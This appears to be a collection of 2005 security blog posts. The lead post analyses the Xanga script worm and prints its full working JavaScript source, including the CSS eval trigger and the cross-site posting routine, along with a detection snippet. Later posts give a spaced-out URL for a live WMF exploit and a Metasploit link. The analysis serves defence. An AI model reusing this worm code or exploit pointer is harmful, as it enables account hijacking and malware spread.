Xanga Hit By Script Worm

Following in the footsteps of fellow blog provider MySpace, Xanga.com appears to have been infected with some kind of worm that compromises the accounts of blog users and replaces content on the sites in order to replicate.

Infected sites can easily be recognized by the following text:

xangas admin owned you.

im a motha fuckin balleR, DG4L.
greets to phrea,camzero,majestic,dgs
“got steve case up on the phone, bitch this camo youve been owned.”
free cam0.

More information as I have it.

[UPDATE: As of 0714 UTC on 31 December, Xanga was apparently shut down in a bid to contain the infection. The shutdown lasted a few minutes, but I have confirmed that the worm is being removed from infected sites, and has been rendered inert by recent changes made on xanga.com. My analysis of the worm follows.]

Technical Overview

The worm consists of a simple HTML/script combination, and is highly primitive in nature. The worm propagates by using the XMLHTTP interface in some browsers to create worm-infected posts on the xanga weblogs of users who visit an infected site while signed in. This approach blurs the line between worm and old-style file infecting viruses. I’ll refer to it as a worm for clarity, since most of the literature on the recent MySpace attack uses the same term. Of particular note is that the worm is ‘dumb’ — it will repeatedly repost itself to previously-infected sites. The attack is extremely noisy, with each post carrying the malware’s obnoxious message.

Aside from the fact that such immature and badly-written messages as the one dropped by the worm would already stand out on most xanga blogs (that I care to read, anyway), the incessant reposting as the worm spread more than likely caused serious clogging. As a result, this worm’s life was extremely short. It is already over as you’re reading this analysis.

It appears upon further research that this worm was a variant of the similar Exodus worm that went quietly and unnoticed on December 19th. It was only in researching this outbreak that I saw the reports of Exodus. It appears that neither worm was written by a very skilled individual, as both strains are easily uprooted, browser-specific, badly-structured, trivially-decoded, and unnecessarily bloated. The worm is technically unimpressive (particularly vis-a-vis Exodus) and is a feat on par with the scores of VBSWG tweaks and edits following the infamous “Kournikova” worm outbreak of 2001.

Cleanup

Xanga.com have taken steps to render existing worm code inert (namely to prevent copycat code from spreading), so users can clean up the worm infection by simply entering their sites in Safe Mode and removing the worm’s infected posts.

Detailed Analysis / Code

The first section of the code can easily be identified as the portion responsible for producing the obscene message:

<h4 class="itemTitle">xangas admin owned you.</h4>im a motha fuckin balleR, DG4L.<br>greets to phrea,camzero,majestic,dgs<br>"got steve case up on the phone, bitch this camo youve been owned."<br>free cam0.

The active portion of the worm is contained entirely in a DIV tag. It has three attributes (ID, STYLE, and CODE):

<DIV id=wormy style="BACKGROUND: url(java
script:ev
al(document.all.wormy.code))" code="[virus body]"></DIV>

The ‘background’ CSS property is used to refer to a background image for an element. The worm appears to use white space to evade the trivial ‘ ‘ URL filter in place on xanga.com. The background image URL is resolved by the browser to:

eval(document.all.wormy.code)

This small section of code triggers the worm’s execution. Alert readers will notice that this construct is a product of non-standard functionality in Internet Explorer. It fails to run in Firefox, as I suspect it does in many other alternative browsers.
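As an added illustration (my own code, not from the original post or from Xanga), the following JavaScript shows why a literal match on the scheme misses the split "java\nscript:" URL above, and how stripping whitespace and control characters from a url() value before inspecting it catches the worm's construct. The function names and the benign sample post are constructed; the worm DIV is the one quoted in the analysis.

```javascript
// Added example, not from the original post: a post-content check that catches the
// worm's CSS "background: url(java\nscript:...)" trick. Function names and the
// sample inputs below are constructed for illustration.

// The worm's DIV as quoted in the analysis, with the real line breaks it relied on.
const WORM_DIV =
  '<DIV id=wormy style="BACKGROUND: url(java\nscript:ev\nal(document.all.wormy.code))" ' +
  'code="[virus body]"></DIV>';

// A harmless post that also uses a CSS background image (constructed sample).
const BENIGN_DIV = '<div style="background: url(/images/bg.png)">hello</div>';

// The "trivial" filter: a literal scheme match. The embedded newline defeats it.
function naiveFilterFlags(html) {
  return /javascript:/i.test(html);
}

// Normalise a url() value the way the browser effectively did before resolving it:
// drop ASCII whitespace and control characters, then compare case-insensitively.
function normalizeUrl(value) {
  return value.replace(/[\x00-\x20\x7f]+/g, '').toLowerCase();
}

// Pull every url(...) value out of the markup (quoted or bare) and report those whose
// normalised form names a script scheme.
const URL_RE = /url\(\s*(['"]?)([\s\S]*?)\1\s*\)/gi;

function findScriptUrls(html) {
  const hits = [];
  let m;
  URL_RE.lastIndex = 0;
  while ((m = URL_RE.exec(html)) !== null) {
    const normalized = normalizeUrl(m[2]);
    if (normalized.startsWith('javascript:') || normalized.startsWith('vbscript:')) {
      hits.push({ raw: m[2], normalized });
    }
  }
  return hits;
}

// Verdict for a submitted post body: reject if any script URL survives normalisation.
function postIsSafe(html) {
  return findScriptUrls(html).length === 0;
}

console.log('naive filter sees worm:', naiveFilterFlags(WORM_DIV));   // false
console.log('normalised filter sees worm:', !postIsSafe(WORM_DIV));    // true
console.log('benign post allowed:', postIsSafe(BENIGN_DIV));           // true
```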

I received the worm in an inert format that had apparently been disinfected by run-time filtering added to xanga.com’s web site after the infection began. I’ve slightly altered the code to make it more readable and to reverse the effects of the filtering.

The worm has a global portion of its code, as well as seven sub-routines. The global portion simply builds the defacement message above before handing off control to main, the worm’s dispatch procedure.

var chr = find(document.body.innerHTML,'style=','HEIGHT');
var J;
var con='im a motha fuckin balleR, DG4L.<br>greets to phrea,camzero,majestic,dgs<br>'+chr+'got steve case up on the phone, bitch this camo youve been owned.'+chr+'<br>free cam0.';
var code;
main()

The code in main reconstructs the worm’s source code using DHTML properties (using its find subprocedure to perform a simple text pattern search) and then calls the httpSend procedure. It delivers three arguments to httpSend:
[1] = STRING '/private/xtools/xtoolspremium.aspx'
[2] = REFERENCE to 'postwormy'
[3] = STRING 'GET'

function main(){
code='<D'+'IV id=wormy style='+chr+'BACKGROUND: url(java\nscript:ev\nal(document.all.wo'+'rmy.code'+find(document.body.innerHTML,'wo'+'rmy.code','<NO'+'SCR'+'IPT>')+'<NO'+'SCR'+'IPT>'
J=getXMLObj();
httpSend('/pri'+'vate/xto'+'ols/xtool'+'spremiu'+'m.a'+'spx',postwormy,'GET');
}

function find(BF,BB,BC){
var R=BF.indexOf(BB)+BB.length;
var S=BF.indexOf(BC,R+1);
return BF.substring(R,S)
}

The httpSend procedure accepts four arguments, but main passes only three, so the fourth (the request body, BK) is undefined for the GET request. The httpSend routine sets a callback procedure and then transmits the request:

function httpSend(BH,BI,BJ,BK){
if(!J){
return false
}
J.onreadystatechange=BI;
J.open(BJ,BH,true);
if(BJ=='POST'){
J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
J.setRequestHeader('Content-Length',BK.length)
}
J.send(BK);
return true
}

The postwormy routine is called when the HTTP transaction is complete. Once this has taken place, the worm has retrieved a copy of /private/xtools/xtoolspremium.aspx, which is the posting form for writing and editing blog entries on Xanga.com. This callback function does the “dirty work” of the worm’s propagation, crafting a POST request to create a new blog entry. Some parts of the request (the __VIEWSTATE and txtUserId fields) are taken from the page it just retrieved:

function postwormy(){
if(J.readyState!=4){
return
}
var AU=J.responseText;
var AS=new Array();
AS['__EVENTTARGET']='';
AS['__EVENTARGUMENT']='';
AS['__VIEWSTATE']=find(AU,'name='+chr+'__VIEWSTATE'+chr+' value='+chr,chr);
AS['txtTitle']='xangas admin owned you.';
AS['xformatblock']='removeFormat';
AS['xfontsize']='removeFormat';
AS['xformatblock']='removeFormat';
AS['txtProfImageName']='';
AS['proftitle1']='';
AS['proftitle2']='';
AS['proftitle3']='';
AS['xztitle1']='';
AS['xztitle2']='';
AS['xzasin1']='';
AS['radAccess']='1';
AS['chkComments']='on';
AS['btnSubmit']='Submit';
AS['txtUserId']=find(AU,'name='+chr+'txtUserId'+chr+' type='+chr+'text'+chr+' value='+chr,chr);
AS['xbgcolor']='';
AS['txtAcc']='0';
AS['xbordercolor']='';
AS['xcontent']=con+code;
AS['xcopypost']='0';
AS['xmsgs']='1';
J=getXMLObj();
httpSend('/pri'+'vate/xto'+'ols/xtool'+'spremiu'+'m.a'+'spx',stop,'POST',paramsToString(AS))
}

The getXMLObj routine is a helper in both cases. It tries various methods of obtaining XMLHTTP objects that are associated with different browsers, in an attempt to avoid creating a browser dependency. The object it returns is then used to conduct the worm’s HTTP session:

function getXMLObj(){
var Z=false;
if(window.XMLHttpRequest){
try{
Z=new XMLHttpRequest()
}
catch(e){
Z=false
}
} else if(window.ActiveXObject){
try{
Z=new ActiveXObject('Msxml2.XMLHTTP')
}catch(e){
try{
Z=new ActiveXObject('Microsoft.XMLHTTP')
}
catch(e){
Z=false
}
}
}
return Z
}

The stop function called as a callback during the POST request is a mere stub. It has no real purpose.

function stop(){
return
}

The paramsToString function is used during the generation of the request body for the worm’s POST request. It functions as a very simplistic URL encoder. The author elected not to use regular expressions for the replacement, and as a result, the loop in this routine is far more intensive than necessary:

function paramsToString(AV){
var N=new String();
var O=0;
for(var P in AV){
if(O>0){
N+='&'
}
var Q=escape(AV[P]);
while(Q.indexOf('+')!=-1){
Q=Q.replace('+','%2B')
}
while(Q.indexOf('&')!=-1){
Q=Q.replace('&','%26')
}
N+=P+'='+Q;
O++
}
return N
}

The worm is quite simple, and even more simple to block: simple text-based matching and filtering on keywords in the worm code appears to have been used to thwart the worm. Indeed, this worm is not much of a “big picture” concern, but it could very well reflect where malware will go in the future. As technology becomes increasingly web-dependent, expect malware to adapt and to begin targeting web application platforms. We’ve seen it with worms like Santy, and we’ll see more of it in the days to come.


Goodbye 2005, welcome 2006 (year statistics)

As 2005 comes to an end, we can look back and try to use that to guess what we will see in 2006 … but let’s first summarize what we had:
1) Over 1500 new vulnerability groups (we call them ‘groups’ since we don’t split an SQL injection and its CSS counterpart into two advisories), which is up by roughly 300 compared to last year.

2) An uproar in exploits (i.e. advisories with little technical details and the majority of it being a PoC or an actual exploit) from 150 to 295.

3) The number of Microsoft related advisories (not just MSXX-XXX) has jumped from 66 to 133, a little bit more than double.

4) IIS related vulnerabilities have declined from 13 to 8.

5) A decrease in the number of Apache related advisories from 23 to 11.

6) The busiest month was May, with over 170 new articles (roughly 6 articles per day, including the weekends).

So what will 2006 bring? My estimate is that we’ll see MORE vulnerabilities. Why? Simply because as more software comes into the consumer market, it is more likely that people will find vulnerabilities in it.

As more Web-based products emerge, SQL injection, directory traversal, cross-site scripting and the like will become the majority of vulnerabilities, while buffer overflows and format strings become the minority.

The number of “Phishing” attacks will greatly increase, and become a lot more clever as the thieves get smarter and the methods become simpler. “Phishing” will also start utilizing more custom made Spyware and exploits, to try and make the victim believe that they are not being “Phished”.


Asset categorization (or, why I like CVSS)

A security group *must* know the value of the assets that they are protecting. Ideally, you determine this value *before* designing your security infrastructure. You cannot design an optimized security architecture without defining critical assets…yet, I see it happening all the time. Security gets worked in on the back end. That’s a problem.

Along a similar vein, vulnerability scanners are a great tool if deployed at the correct time and used correctly. However, a vulnerability scanner cannot tell you the monetary worth of the system that it has just scanned. I’ve seen too many companies that crank up Nessus, run a scan of an entire /16 block, and then start remediating from the top of the report to the bottom. Again, that’s a problem.

So, how does that tie into CVSS? Well, CVSS is a system for assigning a numeric value to a specific flaw. There are a number of factors which go into determining this value; however, the end result is just a positive integer between 0 and 10. This information, coupled with the asset value, gives you a clearly defined list of remediation priority. Multiply the asset value with the CVSS ranking. Presto! You have a prioritized list to give to your Compliance team.

!Dmitry


WMF Spyware/Worm on the loose

(Updated 2005-12-28 16:09 GMT)

A browser-oriented spyware/worm appears to be on the loose. It exploits a vulnerability in the WMF rendering of Windows-based operating systems to infect them.

The worm utilizes a malicious WMF located at “uni on seek. com/ d/t 1/ wmf_exp. htm” (note the extra spaces are here to avoid accidental infection).

The vulnerability being exploited appears to be related to MS05-53, but somehow fully patched systems still get infected by this worm.

Most infections occur on Windows XP machines, but I am not sure that there is a reason why other OS won’t get infected.

According to VirusTotal, only one antivirus/spyware detection system was able to determine that it’s a Trojan.Downloader a few hours ago (around 9:00 GMT), while now most antivirus/spyware products classify it as:

Antivirus      Version          Update      Result
AntiVir        6.33.0.70        12.28.2005  TR/Dldr.WMF.Small
Avast          4.6.695.0        12.28.2005  Win32:Exdown
AVG            718              12.27.2005  no virus found
Avira          6.33.0.70        12.28.2005  TR/Dldr.WMF.Small
BitDefender    7.2              12.28.2005  Exploit.Win32.WMF-PFV
CAT-QuickHeal  8.00             12.28.2005  no virus found
ClamAV         devel-20051108   12.26.2005  no virus found
DrWeb          4.33             12.28.2005  Exploit.MS05-053
eTrust-Iris    7.1.194.0        12.27.2005  no virus found
eTrust-Vet     12.4.1.0         12.28.2005  no virus found
Ewido          3.5              12.28.2005  Not-A-Virus.Exploit.Win32.Agent.r
Fortinet       2.54.0.0         12.28.2005  W32/WMF-exploit
F-Prot         3.16c            12.28.2005  no virus found
Ikarus         0.2.59.0         12.28.2005  no virus found
Kaspersky      4.0.2.24         12.28.2005  Trojan-Downloader.Win32.Agent.acd
McAfee         4661             12.28.2005  Exploit-WMF
NOD32v2        1.1342           12.28.2005  Win32/TrojanDownloader.Wmfex
Norman         5.70.10          12.28.2005  no virus found
Panda          8.02.00          12.28.2005  Exploit/Metafile
Sophos         4.01.0           12.28.2005  Troj/DownLdr-LW
Symantec       8.0              12.28.2005  Download.Trojan
TheHacker      5.9.1.063        12.28.2005  Exploit/WMF
UNA            1.83             12.28.2005  no virus found
VBA32          3.10.5           12.28.2005  no virus found

As can be seen, antivirus companies have now started detecting it, which should bring the infection rate down or at least stop it from getting any worse.

I will try and update you on additional details as they appear.

Metasploit Exploit:
H D Moore has created an exploit from the WMF worm that utilizes the same technique as the worm does to open a shell on a remote Windows XP system; the exploit is available from: http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile


Where have all the Security Architects gone?

As Gadi stated, ‘Looking at it from the other side, though, this comes to show some of the ill in our industry. People buying “products” to do security rather than incorporate products in their security strategy and infrastructure.’

He’s dead on the money. I had planned on blogging about this some time in the next month…but, since he brought it up :) The *art* of architecting secure networks seems to have gone the way of the dodo. Many current security tools seem to be fixing the SYMPTOM and ignoring the CAUSE. The cause of many of our woes is simply poor initial architecture. Period. You don’t need an application firewall if you’ve followed the guidelines for architecting good code. You don’t need an IPS to only allow X% of your traffic to flow to a certain service if you have correctly implemented traffic-shaping on your edge (or core) router. I could go on and on. Many “security” tools are just “Second chance” devices. You’ve incorrectly configured your edge router or never really had a clue how to configure it in the first place? That’s OK, put our “security device” (a router with a fancy GUI) in front of your servers and try it again. Good initial architecture falls into that 80/20 rule. It solves 80% of the problem in 20% (or less) of the time.


Educate your users? Now there’s a novel idea.

I’ve audited organizations which boasted 20 or 30 information security personnel. That’s a decent-sized group. And, when I get to asking them about their User education program, it’s not surprising to hear that they have maybe allocated one-half of a Full time Employee (FTE) to user education. User Education isn’t sexy, stimulating, or fun (usually). However, educating your users is part of COMMUNICATING your policy. You can’t expect people to go the speed limit if you don’t post signs letting them know what the speed limit is.

A well-educated populace can serve as a human IDS, alerting you to possible problems within your network. User education also highlights your security group as the enforcers of the rules. Cars tend to drive closer to the speed limit when they see a police car on the horizon. It’s the same with corporate information security. I try to reach each user at least 4 times a year. This isn’t necessarily a physical act. That is, you can reach your users through snail mail, posters, email, a recorded message, web meeting, interactive demo, a java security game, etc. Primary user education goals would include:

1) VISIBILITY - Simply put, let them know who you are.
2) ASSISTANCE - make the security group available to help the users (your clients, btw) be more secure and productive
3) REWARD - Reward users who have not only adhered to the policies but also helped to make the environment more secure
4) DELEGATE - Appoint a security liaison. I choose one per remote location as well as one per business unit.
5) ACCOUNTABILITY - Remind them of their responsibilities and the Security team’s capabilities.
6) SOLICIT - Users aren’t passive participants in Security. Solicit their feedback and suggestions. What suggestions do they have for making the environment more secure? There should be a mechanism which allows *any* user to give feedback. Allow them to give this feedback anonymously, if they wish. You’ll be surprised at what you get.
7) WARN - Tell them what they should be on the lookout for (Phishing, email attachments, malicious sites, etc.)

I delegate 15% of my staff to User Education. It’s *that* important. We sponsor events, give away prizes, give yearly awards, maintain a 24×7 message board, etc. Your dedicated User Education staffers should be highly creative. Don’t tuck them off in a corner. Make yourselves visible and approachable, it’ll pay off in big ways.

!Dmitry


Cryptoogle - Google One Time Pad Encryption

Cryptoogle is a new kind of encryption developed by frozenbill, JaggedEdges or Gnome (whichever you know him by, it’s all the same person). Cryptoogle is designed to serve as an algorithm for securing data and putting a time-bomb on it. Whatever key you choose gets put through a Google query. Cryptoogle then assembles the results and uses this compilation as a key in a Blowfish cipher on whatever data you want to hide. The decrypter works exactly in reverse. This simple algorithm can protect your data far more than a normal cipher can.

Basically, the results returned by Google are used as a One Time Pad. But since the results found now, and in a few minutes/hours/days, would be different, the original One Time Pad will eventually be lost. How effective is it? Very; this kind of Temporary One Time Pad seems to be quite secure, though its content is not very random. How long does it last? My tests varied depending on the key used for the Google search: words like ‘google’ and ‘microsoft’ lasted at least a few hours (they may still work now), while more common words like names of people lasted a few minutes.

BTW: I have seen more than once that the key didn’t work on one attempt, while it worked on another attempt… Google’s results appear to vary from request to request… could be that the Ads are affecting this as well?

Also I noted that writing a long sentence as the key, i.e. causing Google to return a single hit, was most effective in keeping the decryption working hours after the encryption took place.

(Thanks to WhiteAcid for pointing out this website)


And the academy award goes to…

This blog entry is not about Hollywood, but rather the universities. It is meant to be a short rant about the way that the academy is teaching students.

Let’s start with a few examples I encountered from a friend of mine, studying for his Computer Engineering degree at one of the “top” academic institutes in Israel, the Technion (similar to the American “MIT”).

Recently my friend was taught in class that every DNS resolve request must go through the root name servers.
As if that’s not bad enough by itself, they actually needed to write a PoC that displays and proves the above situation.

But there is one problem. That’s not how DNS resolving works.
I enter www.securiteam.com more than once each day. So why would anyone think that I must go through a root name server? What about the local DNS cache (on my own machine)? What about using my ISP to resolve securiteam.com, so that when someone else makes the same request it will be locally cached?

In fact, most DNS resolve requests do not go to the root name servers, but rather go to the local ISP, local cache or sometimes even static local definitions such as the hosts file (that exists in both Unix/Linux, and on Microsoft Windows).

And another thing: if I choose to define that www.securiteam.com is actually www.google.com in the hosts file, then when I’ll try to access www.securiteam.com it will actually be resolved as www.google.com!

So where are the root DNS servers in this picture? Well, if I try to resolve a new domain that isn’t locally cached, and is not cached at my ISP’s, my ISP DNS will go to the root servers for me and return the results. Only in that case the request will actually go through root servers and even here I do not interact with them directly (I have no real way of knowing that my ISP did so instead of pulling it from its own cache).

So what happens to all those poor students who study the ‘textbook’ answer that has no real practical use?

Another thing that they have learned is that you can resolve an IP to all of its domain names.
That is only very partially true. There are many, many cases in which an IP cannot be resolved to its domain name (if a reverse lookup is not available), and there is no way for me to know for sure that some DNS server out there didn’t define another domain name for that IP.

So the university tries to teach its students that we must access the root name servers to resolve DNS names, and that we can enumerate host names from IP’s as the basics of networking.
Next they will teach that the earth is flat, and that the dust ferry creates the electricity from dust created at the Everest peak.


Why Security tools are like pr0n to the Security Professional

I love the technical end of Security. Coming from a mathematical background, I crave that buzz that comes from proving a tough theorem. In Security, there is nothing that really matches the buzz of reversing a tough binary, or figuring out some undocumented protocol with nothing but blackbox fuzzers and a packet sniffer, or writing that fuzzer that generates an exception in some popular app. Security research is sexy, fun and stimulating. At the same time, it doesn’t often impact the bottom line (or goal) of a more secure network. It’s mental masturbation - fun, habit-forming, sometimes beautiful but meaningless shortly after complete.

Now, all of this uber-technical research leads to … well, it leads to uber-technical security tools. Cool tools - Star-Trek-Cool or Matrix-Cool. We have tools which mimic the human body and tell us when an anomaly occurs within a TCP session, or when a kernel call was followed by some other call which had not been modelled into the norm. We have tools which automatically shut down attacks based on some learned or programmed behavior. We have tools which exploit a flaw and then drop a shell, allowing the clueless user to initiate a second scan from the exploited machine. I could go on and on. We have a veritable CRAPLOAD of tools. We buy these tools, rush them home to our shiny network, deploy them, and at the end of the day there is no discernible increase or decrease in Security Posture. It doesn’t take a PhD in Statistics to tell us that the tools are (at best) a marginal help. They make us *feel* more secure without actually being more secure. Are the tools useless? Some of them are. Are the tools either used wrongly or used at the wrong time in the Security cycle? Many times, yes.

The problem is that the really useful security applications have already been discovered, marketed, and sold. Firewalls, vulnerability scanners and anti-virus are largely useful tools, but that market is already saturated. So, we get these over-engineered, marginally useful security tools. Many vendors would have us buy a tool for its technical aesthetic value. Many of these tools are breathtakingly spectacular, complex, and elegant. We, the geeks, gather around a console at SANS, blackhat, or some other show and catch a chubby watching all that arousing, binary pr0n. And, at times, I nearly succumb and buy the product just to reward the original thought and sheer beauty of the engineering. But, I won’t buy a jigsaw if I need a hammer and neither should you. Art is art and a tool is a tool and rarely the two shall meet. A tool should serve a purpose - a specific purpose relative to your infrastructure and policy.

FOCUS. Are you with me? The goal of a Security Professional should be to (here it comes) increase the level of security on the network. As I mentioned in a prior post, securing a network can be as simple as creating, communicating, and enforcing a specific corporate policy. Increased compliance implies an increase in my security posture. The tool(s) that I deploy will be designed to increase compliance with policies and standards.

!Dmitry


Empowering yourself to not be an event-driven Security Guy/Gal in 2006!

Hi there. My name is Dmitry. That’s not my real name, but that’s OK. I have more than 10 years of experience in IT Security. I’ve worked for or consulted with many, many large organizations. There are tons and tons of blogs that are dedicated to ‘Security Research’. These blogs, while technically very interesting (to the point of distraction, actually), don’t really help anyone get more secure. Or, if they do help, it’s the raw side of the 80/20 rule (i.e. teaching you to spend 80% of your time solving 20% of the problem). The purpose of my ‘blogging’ is simply to tell the truth about the current state of the Security Industry. Over the course of the next few months, I hope to enlighten at least a few readers into thinking about the difference between perceived security and actual security. So, without further ado:

Intro

I ignore XSS bugs. I also ignore most SQL Injection, HTML Injection, header-injection, directory traversal, file upload, and other flaws. In 6 years, the network that I protect has only had two (2) compromises. And, to put things in perspective, the network has 90,000 internal nodes and roughly 400 external IP addresses (DMZ addresses). My budget last year was roughly 3 Million dollars (not a lot, given a staff of 12-15 full timers as well as contractors and part-timers).

You might think that I have a ton of neat toys that keep us safe? Nope. In fact, I don’t have *any* gee-whiz technology. I shun them (more on that later). There is no IPS on my network. I don’t have any software which automatically quarantines worms or trojans. I’m not running host-based anomaly detection. In short, I don’t stay safe by spending millions of dollars on network security equipment and software.

So, maybe I have a crack staff of reverse engineers, TCP/IP ninjas, shellcoders, and vulnerability experts? Nope. The average employee age is 40+. Most of the Security personnel are older IT personnel culled from disparate groups (Mainframes, Rexx programmers, EDI, Sys Admins, HR, Corporate Security, etc.). In short, our technical expertise is probably considerably lower than most other (similar) groups.

Given all this, I’m still not surprised that we have better Security than most other Fortune 100 companies. What’s our ‘magic formula’? It’s easy. We have a strong POLICY and we effectively COMMUNICATE and ENFORCE the policy. This doesn’t mean that we’re policy whores, quoting ISO17799 like it’s the infallible word. We created a policy which matches our business drivers and infrastructure. Period. It works for us. It might not work for any other single company but it works for us. And, at the end of the day, RESULTS are worth a ton more than INTENTIONS.

In the weeks to come, I hope to enumerate some “Computer Security Fallacies” ™…or, commonly accepted methodologies which are inherently prone to failure. To wrap up this Introduction, I’d like to say that if you don’t have a custom POLICY which has been COMMUNICATED and is being ENFORCED, go ahead and stop reading about that XSS flaw which affects maybe 20 users worldwide. Throw away that stack of vendor slicks. Stop sorting your IDS logs. You’re fussing over a scrape on the knee and ignoring a sucking chest wound.

!Dmitry


Chronology of a 0-Day Excel Vulnerability

Here is what we know:
1) Item number 7203336538 appeared on eBay on the 7th of December 2005 (Thanks to OSVDB for taking the snapshot).

2) A few hours later, the item was removed from eBay.

3) On the 9th of December 2005, the seller of the item, fearwall, decided to change his name to smk778.

4) On the 12th of December 2005, the same day the bid should have ended, the following post appeared on Full Disclosure, 2x 0day Microsoft Windows Excel.

What can we learn from this chronology? Quite a bit, but most of it is speculation.

The eBay item might or might not be the same one as the one revealed several days later, but the coincidences are too strong here.

The smk778 (fearwall) person might or might not be related to the heapoverflow team/forum; there appears to be no relation between the two (the person and the group).

I hope more information will come to light about this issue, hopefully also from users reading this post and shedding more light on the subject, but the chronology shown here shows a clear path between the vulnerability described in an eBay item and the later full disclosure of a (possible) 0-day Excel vulnerability.


Final score

Sears Wins 2005 “Not My Job” Award
Or, Never Let Salespeople Try to Install Your Dryer

I, of course, miss my Reason-For-Being when I am away travelling, but
for some odd reason she misses me, as well, rather than being relieved
at not having me underfoot all the time.

So I was coming back from a teaching trip, and not only was it a back-
to-back set of two courses (one of which had been changed in mid-
trip), but, as she was starting up a load of laundry, the good old
washing machine starts making the “load of ball bearings” noise that
the repair people had been unable to diagnose. What’s worse, this
time around it starts making dripping sounds, and, sure enough, soon
there’s water running out from under the machine.

So, after some investigation and discussion, we decide to get a new
washer and dryer. And after more investigation, decide on some
machines.

(I have to point out that my Reason-For-Being is very careful about
the laundry, so much so that it is almost physically painful for her
to have to use someone else’s machines, and see the difference that
results from lesser attention to the details. Laundromat machines are
just not in the picture.)

One of the possible machines is Sears house brand, Kenmore, so we
toddle down to the local Sears. As luck would have it, we run into
the Excellent Sales Representative for 2004 in Major Appliances. We
discuss options, measure machines (the space is tight, so we don’t
just go on the stated sizes), and we buy a set of machines. And pay
extra for delivery and installation. We specify evening delivery, so
that Gloria, who has, let’s face it, good cause for not trusting me
with a washrag, can be there to ensure that, when the old machines are
removed, the floor and walls get a good scrubbing before the new ones
are put back in place.

We are told to disconnect the old washer from the taps ourselves, and
to buy ten feet of four inch metal dryer conduit. So we do that.

That was Sunday.

Tuesday night, dispatch tells us that we are on for 5 pm to 7 pm on
Wednesday night.

Wednesday afternoon, the delivery guys call. They are in the area,
and can they install the machines now, instead of tonight? As a
favour to Sears, we agree, even though it isn’t very convenient.

The delivery guys come. They complain about the dryer vent. They
create a leak in the tap when connecting the washer (which they
install first). Then they complain about the space, and refuse to
install the dryer. And leave. Swearing. (They are swearing, not me.
Although my blood pressure is starting to get a little high.)

(Parenthetically, *everyone* I’ve told this story who has ever
installed a washer and dryer, professionally or otherwise, has said at
this point that you *always* install the dryer first, and then the
washer.)

I call the store. Can’t get our ESR for 2004. Another sales
representative snippily informs me that *she* always measures the
machines. (We had.) I call back, and finally get our ESR2K4. She
says that she has already called a service person, and we will be
getting a call in the morning between 8:30 am and 10:30 am to tell us
when he will be coming. Since this is exactly the time I am out most
days, I ask if she has given the service dispatch my cell phone
number. No, she hasn’t. Can she call them back and give them my cell
number, please? At this point, for some reason, she gets really
vague, but indicates that, no, she can’t.

I call the store back and ask to speak with the manager of major
appliances. The MMA is naturally appalled, and vows that a) we will
not have to pay for the delivery/installation fee, and b) we *will*
have working machines by the end of Thursday. He will also ensure
that the service person gets the cell number so that I’m properly
called.

Thursday morning I get a call from Sears. Not the service dispatch,
the delivery dispatch. Was I satisfied with the delivery service?
The delivery dispatch gets a bit of an earful. Delivery dispatch has
a series of questions, to most of which I have to answer “no.” As in,
no, the ESR2K4 did *not* provide us with the pamphlet that outlined
delivery and installation requirements. And so on. (As far as I’ve
been able to determine, nothing whatsoever results from this phone
conversation.)

Somewhat later I get a call from the service guy. He will be there
between 1 pm and 3:30 pm. So I stay home all afternoon. At 3:35 he
shows up. I’m a little concerned at this point, since I have to leave
at 4:30 myself. However, my concern was groundless. He looked at the
dryer vent and the dryer plug, announced that he was neither a vent
person nor an electrician, and left.

I drive down to Sears. Fortunately for any sales reps that I might
have encountered, the first two people I see are the ESR2K4 and the
MMA. I outline the events of the day. They start asking questions
about the space, and I offer to let them look for themselves. They
decide to come. So I end up with the ESR2K4 and the MMA in my
kitchen, looking at the washer and dryer.

Then they try to fix it.

I tell you, the sight of an ESR in a slinky dress and strappy high
heels trying to crawl behind a dryer, and an MMA in a blue pinstripe
suit down on the floor looking up a dusty dryer vent pipe is one to
behold. Almost worth the money I was losing as a magazine and an
encyclopedia were waiting for articles and a lawyer in Dallas was
waiting for research. But not quite. Despite the attempt to show
that Sears staff goes that extra little bit, experience does tell: the
MMA mangled the dryer vent elbow fitting (and then complained that it
was no good anyway because it didn’t have the right bracket on the
end) and the ESR crushed the new dryer vent pipe. (The ESR, in
testing to see whether the dryer was working, didn’t bother to take
out the shoe drying shelf, and didn’t see any particular problem in
the crashes and thumps going on inside as the dryer turned.)

My Reason-For-Being found a competent handyman who came and installed
the dryer and fixed some problems with the installation of the washer.
The MMA agrees (I have, by now, memorized not only the phone number
for the Sears store, but also the process for getting through to the
right person, which isn’t easy) to take some money off so we can pay
the handyman, but then the ESR welshes on the deal and I have to make
multiple calls and visits to the store to get that straightened out.

Final score:

Sears: installation people who won’t install, service people who won’t
service, muddy bootprints all over the kitchen and dining room,
complaints and swearing, four and a half hours waiting for people to
show up when they said they would, three visits and four people on
site for an hour and 45 minutes, nine phone calls to the store, six
visits to the store, one untested and partially installed washer, and
a dryer in the middle of the kitchen.

Competent handyman: a little drywall dust, installed and tested dryer,
refit and re-leveled washer, thirty minutes.

copyright 2005, Robert M. Slade


Defining “Authorized”

I read an interesting post on Ido Kanner’s blog about the Egilman civil case. Egilman sued an individual after that individual accessed his web site using credentials of another user.

Rather than bringing his case under Title 18, Section 1030 (which governs “unauthorized access to a protected computer system”), Egilman chose to file his case under the Digital Millennium Copyright Act (DMCA) as an anti-circumvention violation. Egilman’s claim was that using a password without permission from the site owner amounted to “circumvention of a technological measure that effectively controls access to a work protected under this title [DMCA].”

The judge reviewing the case, of course, threw it out, finding no indication that an intent to circumvent existed. Rather than circumventing the protection, the defendant was simply complying with it. Egilman’s decision to pursue the case in this manner is indeed puzzling until one looks at the statute involved.

Title 18, Section 1030, offers three potential points of prosecution that would’ve been relevant to Egilman. Any person who commits any of the following actions is guilty of a felony under Section 1030:

(2) intentionally accesses a computer without authorization or exceeds authorized access, and thereby obtains—

[…]

(C) information from any protected computer if the conduct involved an interstate or foreign communication;

[…]

(4) knowingly and with intent to defraud, accesses a protected computer without authorization, or exceeds authorized access, and by means of such conduct furthers the intended fraud and obtains anything of value, unless the object of the fraud and the thing obtained consists only of the use of the computer and the value of such use is not more than $5,000 in any 1-year period;

[…]

(6) knowingly and with intent to defraud traffics (as defined in section 1029) in any password or similar information through which a computer may be accessed without authorization, if—
(A) such trafficking affects interstate or foreign commerce;

[…]

Given the federal court’s jurisdiction over this issue, Egilman could reasonably have convinced a judge that the defendant obtained information from a protected computer without authorization in violation of paragraph 2, or that the defendant obtained something of value without authorization in violation of paragraph 4. A less-straightforward, but still plausible case could’ve been made for illegal trafficking of a password in violation of paragraph 6.

